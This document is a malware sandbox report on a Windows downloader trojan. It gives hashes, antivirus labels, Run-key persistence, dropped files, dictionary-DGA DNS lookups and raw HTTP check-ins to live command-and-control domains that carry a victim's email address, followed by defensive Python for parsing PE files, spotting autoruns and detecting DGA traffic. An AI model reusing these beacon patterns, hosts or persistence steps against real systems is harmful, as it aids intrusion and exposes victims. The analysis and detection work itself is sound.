Analysis Date: 2015-08-13 06:55:56
MD5: 6261acdd356f876e141027b38febe918
SHA1: 47187e55e4f8de69e881d8596a79d48ceb38cfc7

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 022d606851c6acff831bff6f2c17f181 sha1: a48e15d25697c3a7e9dbf67d70ded5a7ab49c613 size: 295424
Section .rdata md5: 43f40f5f714a96e7ad7eb4a445aed207 sha1: 6f81ae90ec3a0182372a131e43497afa184135be size: 33280
Section .data md5: e6b58a9cb8092f5ddee11c78e745b7a8 sha1: 89b60b7f6fbad06517c51e6a075f9c01049c898e size: 107008
Timestamp: 2014-10-30 10:25:27
Packer: Microsoft Visual C++ ?.?
PEhash: 036acdc1c26ea44bac9e22c3fdc46819328d5d7f
IMPhash: 5e054b69c5566c4f30fa9350a139dbdc
AV CA (E-Trust Ino): no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV Dr. Web: Trojan.DownLoader13.16234
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV BullGuard: Gen:Variant.Symmi.22722
AV Padvish: no_virus
AV VirusBlokAda (vba32): no_virus
AV CAT (quickheal): Trojan.Dynamer.AC3
AV Trend Micro: TROJ_FORUCON.BMC
AV Kaspersky: Trojan.Win32.Generic
AV Zillya!: no_virus
AV Emsisoft: Gen:Variant.Symmi.22722
AV Ikarus: Trojan.FBAccountLock
AV Frisk (f-prot): no_virus
AV Authentium: W32/Wonton.B.gen!Eldorado
AV MalwareBytes: Trojan.Zbot.WHE
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV K7: Trojan ( 004cb2771 )
AV BitDefender: Gen:Variant.Symmi.22722
AV Fortinet: W32/Agent.VNC!tr
AV Symantec: Downloader.Upatre!g15
AV Grisoft (avg): Win32/Cryptor
AV Eset (nod32): Win32/Agent.VNC
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Twister: no_virus
AV Avira (antivir): TR/AD.Nivdort.M.7
AV Mcafee: Trojan-FEMT!6261ACDD356F
AV Rising: no_virus
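
The section hashes, section sizes and compile timestamp in the table above are read straight out of the PE headers. The script below is an added example, not the sandbox's own code: a stdlib-only parser that walks the DOS, COFF and section headers and reproduces those fields for any PE, together with a builder for a synthetic PE32 image so that it runs offline. The synthetic image, its section contents and the shortened optional header are constructed assumptions for the example and are not the analysed sample; only the timestamp value is taken from the report.

```python
import hashlib
import struct
from datetime import datetime, timezone

FILE_ALIGN = 0x200      # FileAlignment used by the synthetic builder (matches the report's sizes)
OPT_HEADER_LEN = 0x60   # assumption: truncated optional header, the parser only reads Magic


def hash_bytes(raw):
    """MD5 and SHA1 hex digests of a byte string (what the per-section columns hold)."""
    return hashlib.md5(raw).hexdigest(), hashlib.sha1(raw).hexdigest()


def _align(n, a):
    return (n + a - 1) // a * a


def build_minimal_pe(sections, timestamp):
    """Construct a synthetic PE32 file from (name, raw_bytes) pairs. Only the fields
    the parser below reads are meaningful; this is constructed input, not the sample."""
    headers_len = 0x40 + 4 + 20 + OPT_HEADER_LEN + 40 * len(sections)
    raw_ptr = _align(headers_len, FILE_ALIGN)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp,  # IMAGE_FILE_MACHINE_I386
                       0, 0, OPT_HEADER_LEN, 0x102)
    opt = struct.pack("<H", 0x10B).ljust(OPT_HEADER_LEN, b"\0")      # Magic = PE32
    hdrs, bodies, va = b"", b"", 0x1000
    for name, data in sections:
        size = _align(len(data), FILE_ALIGN)                         # SizeOfRawData
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                            len(data), va, size, raw_ptr if size else 0,
                            0, 0, 0, 0, 0x60000020)
        bodies += data.ljust(size, b"\0")
        raw_ptr += size
        va += max(_align(len(data), 0x1000), 0x1000)
    image = (dos + b"PE\0\0" + coff + opt + hdrs).ljust(_align(headers_len, FILE_ALIGN), b"\0")
    return image + bodies


def pe_static_details(data):
    """Walk the DOS, COFF and section headers and hash each section's raw bytes,
    reproducing the Static Details fields (file type, timestamp, per-section hashes)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, tstamp, _, _, opt_len, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0] if opt_len >= 2 else 0
    details = {
        "machine": machine,
        "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "unknown"),
        # TimeDateStamp is seconds since the Unix epoch, UTC, and trivially forgeable
        "timestamp": datetime.fromtimestamp(tstamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "sections": [],
    }
    sec_off = e_lfanew + 24 + opt_len
    for i in range(nsec):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, sec_off + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        if len(raw) != raw_size:
            raise ValueError("section %r points past end of file" % name)
        md5, sha1 = hash_bytes(raw)
        details["sections"].append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                                    "md5": md5, "sha1": sha1, "size": raw_size})
    return details


def format_static_details(details):
    """Render the result in the same line format as the report's Static Details."""
    lines = ["File type: %s, machine 0x%X" % (details["format"], details["machine"])]
    lines += ["Section %s md5: %s sha1: %s size: %d" % (s["name"], s["md5"], s["sha1"], s["size"])
              for s in details["sections"]]
    lines.append("Timestamp: " + details["timestamp"])
    return "\n".join(lines)


# Constructed sample input: section contents are arbitrary filler; the timestamp is
# the one from the report so the UTC rendering can be compared against the table.
SAMPLE_TS = int(datetime(2014, 10, 30, 10, 25, 27, tzinfo=timezone.utc).timestamp())
SAMPLE_SECTIONS = [(".text", b"\x90" * 0x300), (".rdata", b"str\0" * 0x40),
                   (".data", bytes(range(256)) * 2), (".bss", b"")]

if __name__ == "__main__":
    print(format_static_details(pe_static_details(build_minimal_pe(SAMPLE_SECTIONS, SAMPLE_TS))))
```

Two things the numbers in the table confirm: every section size listed (295424, 33280, 107008) is a multiple of 0x200, the linker's FileAlignment, which is why the builder pads raw data the same way; and the compile timestamp (2014-10-30) predates the analysis date by almost a year, but it is attacker-controlled, so section hashes are the stronger pivot when looking for sibling builds.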

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Drive Disk Studio Presentation WMI ➝ C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\vdvstgbo.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.zw
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe"
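
The Run value above is the persistence artifact to hunt for: a value name assembled from random English words, pointing at a freshly dropped executable inside a random-looking directory under the user's Application Data. The triage script below is an added example, not part of the sandbox report: it scores autorun entries on exactly those two traits. The entries it runs over are constructed here (the first is the one from this report, the other two are benign look-alikes invented for contrast), and the thresholds inside looks_random are assumptions chosen for this case.

```python
import ntpath
import re

# Constructed HKCU\...\Run values as (value name, target). The first row is the entry
# this sample wrote; the other two are benign look-alikes invented for contrast.
RUN_ENTRIES = [
    ("Drive Disk Studio Presentation WMI",
     r"C:\Documents and Settings\Administrator\Application Data\swqiagdhdmfzcuy\iywppyrxeags.exe"),
    ("OneDrive", r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"),
    ("Adobe Reader Speed Launcher", r"C:\Program Files\Adobe\Reader\Reader_sl.exe"),
]

# Per-user profile locations where an autorun target deserves a second look
# (assumption: tune to the environment).
PROFILE_DIRS = ("\\application data\\", "\\appdata\\")


def looks_random(name):
    """Heuristic for generated names like 'swqiagdhdmfzcuy': lowercase letters only,
    at least 10 of them, few repeated letters and a vowel ratio well below English
    words. The thresholds are assumptions chosen for this example."""
    if not re.fullmatch(r"[a-z]{10,}", name):
        return False
    distinct_ratio = len(set(name)) / len(name)
    vowel_ratio = sum(c in "aeiou" for c in name) / len(name)
    return distinct_ratio >= 0.6 and vowel_ratio < 0.35


def score_autorun(target):
    """Return (score, reasons): 1 point for living under the user profile,
    2 for every random-looking directory or file-stem component."""
    score, reasons = 0, []
    if any(d in target.lower() for d in PROFILE_DIRS):
        score += 1
        reasons.append("target under per-user profile directory")
    head, tail = ntpath.split(target)
    components = head.split("\\") + [ntpath.splitext(tail)[0]]
    for comp in components:
        if looks_random(comp.lower()):
            score += 2
            reasons.append("random-looking path component: " + comp)
    return score, reasons


def autorun_findings(entries, min_score=2):
    """Entries scoring at least min_score, highest score first."""
    found = []
    for value_name, target in entries:
        score, reasons = score_autorun(target)
        if score >= min_score:
            found.append({"value": value_name, "target": target,
                          "score": score, "reasons": reasons})
    return sorted(found, key=lambda f: -f["score"])


if __name__ == "__main__":
    for f in autorun_findings(RUN_ENTRIES):
        print("%d  %s -> %s" % (f["score"], f["value"], f["target"]))
        for r in f["reasons"]:
            print("     " + r)
```

On a live host the input would be the values from `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` or an Autoruns export. A hit here is worth corroborating with the other artifacts from the same run: the second dropped executable and the `.zw` companion file in the same directory, and a child process whose command line starts with `WATCHDOGPROC`.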

Network Details:

DNS: cigaretteapple.net (Type: A) ➝ 195.22.26.231
DNS: cigaretteapple.net (Type: A) ➝ 195.22.26.252
DNS: cigaretteapple.net (Type: A) ➝ 195.22.26.253
DNS: cigaretteapple.net (Type: A) ➝ 195.22.26.254
DNS: personmeasure.net (Type: A) ➝ 184.168.221.35
DNS: machinemeasure.net (Type: A) ➝ 95.211.230.75
DNS: becausefather.net (Type: A)
DNS: expectapple.net (Type: A)
DNS: becauseapple.net (Type: A)
DNS: expectbuilt.net (Type: A)
DNS: becausebuilt.net (Type: A)
DNS: expectcarry.net (Type: A)
DNS: becausecarry.net (Type: A)
DNS: personfather.net (Type: A)
DNS: machinefather.net (Type: A)
DNS: personapple.net (Type: A)
DNS: machineapple.net (Type: A)
DNS: personbuilt.net (Type: A)
DNS: machinebuilt.net (Type: A)
DNS: personcarry.net (Type: A)
DNS: machinecarry.net (Type: A)
DNS: suddenfather.net (Type: A)
DNS: foreignfather.net (Type: A)
DNS: suddenapple.net (Type: A)
DNS: foreignapple.net (Type: A)
DNS: suddenbuilt.net (Type: A)
DNS: foreignbuilt.net (Type: A)
DNS: suddencarry.net (Type: A)
DNS: foreigncarry.net (Type: A)
DNS: whetherfather.net (Type: A)
DNS: rightfather.net (Type: A)
DNS: whetherapple.net (Type: A)
DNS: rightapple.net (Type: A)
DNS: whetherbuilt.net (Type: A)
DNS: rightbuilt.net (Type: A)
DNS: whethercarry.net (Type: A)
DNS: rightcarry.net (Type: A)
DNS: figurefather.net (Type: A)
DNS: thoughfather.net (Type: A)
DNS: figureapple.net (Type: A)
DNS: thoughapple.net (Type: A)
DNS: figurebuilt.net (Type: A)
DNS: thoughbuilt.net (Type: A)
DNS: figurecarry.net (Type: A)
DNS: thoughcarry.net (Type: A)
DNS: picturefather.net (Type: A)
DNS: cigarettefather.net (Type: A)
DNS: pictureapple.net (Type: A)
DNS: picturebuilt.net (Type: A)
DNS: cigarettebuilt.net (Type: A)
DNS: picturecarry.net (Type: A)
DNS: cigarettecarry.net (Type: A)
DNS: childrenfather.net (Type: A)
DNS: familyfather.net (Type: A)
DNS: childrenapple.net (Type: A)
DNS: familyapple.net (Type: A)
DNS: childrenbuilt.net (Type: A)
DNS: familybuilt.net (Type: A)
DNS: childrencarry.net (Type: A)
DNS: familycarry.net (Type: A)
DNS: eitherfather.net (Type: A)
DNS: englishfather.net (Type: A)
DNS: eitherapple.net (Type: A)
DNS: englishapple.net (Type: A)
DNS: eitherbuilt.net (Type: A)
DNS: englishbuilt.net (Type: A)
DNS: eithercarry.net (Type: A)
DNS: englishcarry.net (Type: A)
DNS: expectmeasure.net (Type: A)
DNS: becausemeasure.net (Type: A)
DNS: expectdinner.net (Type: A)
DNS: becausedinner.net (Type: A)
DNS: expectafraid.net (Type: A)
DNS: becauseafraid.net (Type: A)
DNS: expectcircle.net (Type: A)
DNS: becausecircle.net (Type: A)
DNS: persondinner.net (Type: A)
DNS: machinedinner.net (Type: A)
DNS: personafraid.net (Type: A)
DNS: machineafraid.net (Type: A)
DNS: personcircle.net (Type: A)
DNS: machinecircle.net (Type: A)
DNS: suddenmeasure.net (Type: A)
DNS: foreignmeasure.net (Type: A)
DNS: suddendinner.net (Type: A)
DNS: foreigndinner.net (Type: A)
DNS: suddenafraid.net (Type: A)
DNS: foreignafraid.net (Type: A)
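
Every name queried above is a two-word .net domain drawn from 16 first words and 8 second words, and only three of them (cigaretteapple.net, personmeasure.net, machinemeasure.net) returned an address. That is the shape of a dictionary-based domain generation algorithm, and a burst of such lookups from one host is the network-side detection. The detector below is an added example, not something from the report: it parses passive-DNS lines, recognises word-pair labels against a word list, and raises one alert per client and five-minute bucket when enough distinct names appear, listing the ones that resolved as the likely live C2. The log lines are constructed (names from this report, invented timestamps, client addresses and response codes), the word list is lifted from the report rather than a real dictionary, and the thresholds are assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Word list used to recognise two-word labels. Taken from the names in this report;
# a production detector would load a real dictionary (assumption).
WORDS = {
    "cigarette", "person", "machine", "because", "expect", "sudden", "foreign",
    "whether", "right", "figure", "though", "picture", "children", "family",
    "either", "english", "father", "apple", "built", "carry", "measure",
    "dinner", "afraid", "circle",
}

# Constructed passive-DNS log, one query per line: "<iso time> <client> <qname> <rcode>".
# Query names are from the sandbox run; timestamps, clients and rcodes are invented.
DNS_LOG = """\
2015-08-13T06:56:01 192.168.1.1 cigaretteapple.net NOERROR
2015-08-13T06:56:01 192.168.1.1 personmeasure.net NOERROR
2015-08-13T06:56:02 192.168.1.1 machinemeasure.net NOERROR
2015-08-13T06:56:02 192.168.1.1 becausefather.net NXDOMAIN
2015-08-13T06:56:02 192.168.1.1 expectapple.net NXDOMAIN
2015-08-13T06:56:03 192.168.1.1 becauseapple.net NXDOMAIN
2015-08-13T06:56:03 192.168.1.1 expectbuilt.net NXDOMAIN
2015-08-13T06:56:03 192.168.1.1 becausebuilt.net NXDOMAIN
2015-08-13T06:56:04 192.168.1.1 expectcarry.net NXDOMAIN
2015-08-13T06:56:04 192.168.1.1 becausecarry.net NXDOMAIN
2015-08-13T06:56:05 192.168.1.1 personfather.net NXDOMAIN
2015-08-13T06:56:05 192.168.1.1 machinefather.net NXDOMAIN
2015-08-13T06:56:06 192.168.1.1 personapple.net NXDOMAIN
2015-08-13T06:56:06 192.168.1.1 machineapple.net NXDOMAIN
2015-08-13T06:56:07 192.168.1.1 personbuilt.net NXDOMAIN
2015-08-13T06:56:09 192.168.1.1 www.example.com NOERROR
2015-08-13T06:57:30 192.168.1.50 mail.example.org NOERROR
2015-08-13T06:57:31 192.168.1.50 familyapple.net NXDOMAIN
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def split_two_words(label, min_len=3):
    """Return (first, second) when the label is exactly two known words, else None."""
    for i in range(min_len, len(label) - min_len + 1):
        a, b = label[:i], label[i:]
        if a in WORDS and b in WORDS:
            return a, b
    return None


def parse_dns_log(text):
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.fromisoformat(m.group(1))
            records.append((ts, m.group(2), m.group(3).lower().rstrip("."), m.group(4)))
    return records


def dga_alerts(records, window=timedelta(minutes=5), min_domains=10):
    """One alert per (client, time bucket) holding at least min_domains distinct
    two-word .net names. Fixed buckets are simple but can split a burst that
    straddles a boundary; a sliding window avoids that at some cost in code."""
    buckets = defaultdict(list)
    for ts, client, qname, rcode in records:
        labels = qname.split(".")
        if len(labels) != 2 or labels[1] != "net":
            continue
        pair = split_two_words(labels[0])
        if pair:
            bucket = int(ts.timestamp() // window.total_seconds())
            buckets[(client, bucket)].append((ts, qname, rcode, pair))
    alerts = []
    for (client, _), hits in sorted(buckets.items()):
        domains = {h[1] for h in hits}
        if len(domains) < min_domains:
            continue
        nx = sum(1 for h in hits if h[2] == "NXDOMAIN")
        alerts.append({
            "client": client,
            "first_seen": min(h[0] for h in hits),
            "distinct_domains": len(domains),
            "nxdomain_ratio": nx / len(hits),
            "second_words": Counter(h[3][1] for h in hits).most_common(3),
            "resolved": sorted(h[1] for h in hits if h[2] == "NOERROR"),
        })
    return alerts


if __name__ == "__main__":
    for a in dga_alerts(parse_dns_log(DNS_LOG)):
        print(a)
```

The `resolved` list is the part worth acting on: the generated names that the operator has actually registered are the ones to block and to pivot on, while the NXDOMAIN majority is the signal that identifies the infected client.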
HTTP GET: http://cigaretteapple.net/index.php?email=office@moldoglass.ro&method=post&len
User-Agent: (none)
HTTP GET: http://personmeasure.net/index.php?email=office@moldoglass.ro&method=post&len
User-Agent: (none)
HTTP GET: http://machinemeasure.net/index.php?email=office@moldoglass.ro&method=post&len
User-Agent: (none)
Flows TCP: 192.168.1.1:1031 ➝ 195.22.26.231:80
Flows TCP: 192.168.1.1:1032 ➝ 184.168.221.35:80
Flows TCP: 192.168.1.1:1033 ➝ 95.211.230.75:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206369 67617265   se..Host: cigare
0x00000070 (00112)   74746561 70706c65 2e6e6574 0d0a0d0a   tteapple.net....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207065 72736f6e   se..Host: person
0x00000070 (00112)   6d656173 7572652e 6e65740d 0a0d0a0a   measure.net.....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206d61 6368696e   se..Host: machin
0x00000070 (00112)   656d6561 73757265 2e6e6574 0d0a0d0a   emeasure.net....
0x00000080 (00128)                                         
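
The three dumps above are the complete check-in requests: the Host header rotates across the three resolved domains while the request line stays identical, so a signature should key on the query string rather than the host. The added example below (not code from the report) turns one hexdump back into bytes, parses the request line, headers and query string, and encodes the traits all three share: GET /index.php with an email= parameter, method=post, a bare len key with no value, HTTP/1.0 and no User-Agent header. The hexdump is the first one from this page, embedded verbatim; the parser and the signature function are assumptions written for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The first Raw Pcap dump from this page, copied verbatim (the empty 0x80 row omitted).
HEXDUMP = """\
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206369 67617265   se..Host: cigare
0x00000070 (00112)   74746561 70706c65 2e6e6574 0d0a0d0a   tteapple.net....
"""

# hex offset, decimal offset, then up to four 32-bit hex words; the ASCII column is ignored
ROW_RE = re.compile(r"^0x[0-9a-fA-F]{8}\s+\(\d+\)\s+((?:[0-9a-fA-F]{8}\s+){1,4})")


def hexdump_to_bytes(dump):
    """Rebuild the raw TCP payload from the sandbox's hexdump layout."""
    out = bytearray()
    for line in dump.splitlines():
        m = ROW_RE.match(line)
        if m:
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)


def parse_http_request(raw):
    """Split an HTTP/1.x request into method, path, version, headers and query
    parameters. keep_blank_values matters: the beacon sends 'len' with no value."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", errors="replace").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path, "version": version,
            "headers": headers, "host": headers.get("host"),
            "params": parse_qs(url.query, keep_blank_values=True), "body": body}


def matches_checkin(req):
    """Traits shared by all three check-ins in the report: GET /index.php carrying
    email=..., method=post and a valueless len, over HTTP/1.0 with no User-Agent."""
    p = req["params"]
    return (req["method"] == "GET" and req["path"] == "/index.php"
            and req["version"] == "HTTP/1.0"
            and "email" in p and p.get("method") == ["post"] and p.get("len") == [""]
            and "user-agent" not in req["headers"])


def extract_iocs(req):
    """Network indicators worth recording from one check-in."""
    return {"host": req["host"], "email": req["params"].get("email", [None])[0]}


if __name__ == "__main__":
    req = parse_http_request(hexdump_to_bytes(HEXDUMP))
    print(matches_checkin(req), extract_iocs(req))
```

The email address in the query string is the victim-side identifier the sample beacons with, so it belongs in the incident record alongside the three hosts; the absent User-Agent and the HTTP/1.0 version are the cheap proxy-log checks when no packet capture is available.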


Strings